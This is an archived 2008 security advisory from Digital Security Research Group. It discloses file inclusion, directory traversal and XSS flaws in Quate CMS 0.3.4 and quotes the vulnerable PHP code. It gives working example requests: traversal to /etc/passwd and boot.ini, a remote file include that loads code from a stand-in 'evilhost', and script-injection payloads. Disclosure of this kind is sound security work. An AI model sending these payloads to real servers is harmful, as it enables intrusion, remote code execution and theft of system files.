what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

DSECRG-08-024.txt

DSECRG-08-024.txt
Posted May 23, 2008
Authored by Digital Security Research Group | Site dsecrg.com

Quate CMS version 0.3.4 suffers from remote file inclusion, local file inclusion, directory traversal, and multiple cross site scripting vulnerabilities. Everything about this application screams run away.

tags | exploit, remote, local, vulnerability, xss, file inclusion
SHA-256 | 955aa3bfe6d8529e5ca3c4eacd839d624668d2140f3ed9c45ee1d3b6f8c01fdd

DSECRG-08-024.txt

Change Mirror Download

Digital Security Research Group [DSecRG] Advisory #DSECRG-08-024


Application: Quate CMS
Versions Affected: 0.3.4
Vendor URL: http://www.quate.net/
Bugs: RFI, Multiple LFI, Directory traversal, Multiple XSS
Exploits: YES
Reported: 18.03.2008
Second report: 25.03.2008
Vendor response: NONE
Solution: NONE
Date of Public Advisory: 23.05.2008
Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)



Description
***********

Quate CMS system has multiple security vulnerabilities:

1. Multiple Remote/Local File Include
2. Multiple Linked XSS vulnerabilities
3. Directory traversal


Details
*******

1. Quate CMS has Multiple Local File Include vulnerabilities.

1.1 Local File Include vulnerability found in script admin/includes/footer.php

Code
****
#################################################

if ($not_logged_in != 1) {
if (file_exists("includes/themes/" .$row_secure['account_theme']. "/footer.php")) {
require_once("themes/" .$row_secure['account_theme']. "/footer.php");
} else {
require_once("themes/" .$admin_template_default. "/footer.php");
}
} else {
require_once("themes/" .$admin_template_default. "/footer.php");
}

#################################################

Example:

http://[server]/[installdir]/admin/includes/footer.php?admin_template_default=../../../../../../../../../../../../../etc/passwd%00
http://[server]/[installdir]/admin/includes/footer.php?row_secure[account_theme]=../../../../../../../../../../../../../etc/passwd%00
http://[server]/[installdir]/admin/includes/footer.php?not_logged_in=1&admin_template_default=../../../../../../../../../../../../../etc/passwd%00


1.2 Remote and Local File Include vulnerability found in script admin/includes/header.php

Code
****
#################################################

if ($bypass_installed != 1) {
if (!is_file("../includes/installed")) {
...
require("../includes/simple_gui.php");
exit();
}
}

if ($bypass_restrict != 1) {
require_once($secure_page_path. "includes/secure.php");
}

$admin_template_default = "default";
if ($not_logged_in != 1) {
//echo $row_secure['account_theme'];
if (file_exists("includes/themes/" .$row_secure['account_theme']. "/header.php")) {
require_once("themes/" .$row_secure['account_theme']. "/header.php");
} else {
require_once("themes/" .$admin_template_default. "/header.php");
}
} else {
require_once("themes/" .$admin_template_default. "/header.php");
}

#################################################

Example:

http://[server]/[installdir]/admin/includes/header.php?bypass_installed=1&secure_page_path=http://evilhost/info.php%00
http://[server]/[installdir]/admin/includes/header.php?bypass_installed=1&bypass_restrict=1&row_secure[account_theme]=../../../../../../../../../../../../../etc/passwd%00


---------------------------------------------------------------------


2. Linked XSS in Path vulnerability found in following pages:

/admin/index.php
/admin/login.php
/admin/credits.php
/upgrade/index.php

Example:

http://[server]/[installdir]/admin/login.php/"><script>alert("DSecRG XSS")</script>
http://[server]/[installdir]/upgrade/index.php/"><IMG SRC="javascript:alert('DSecRG XSS')

---------------------------------------------------------------------


3. File Manager directory traversal

Administrator can access system files outside htdocs directory using directory traversal vulnerability.

http://[server]/[installdir]/admin/filemanager.php?type=edit&dir=/../../../../../../../../..&file=boot.ini



About
*****

Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.


Contact: research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)







Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close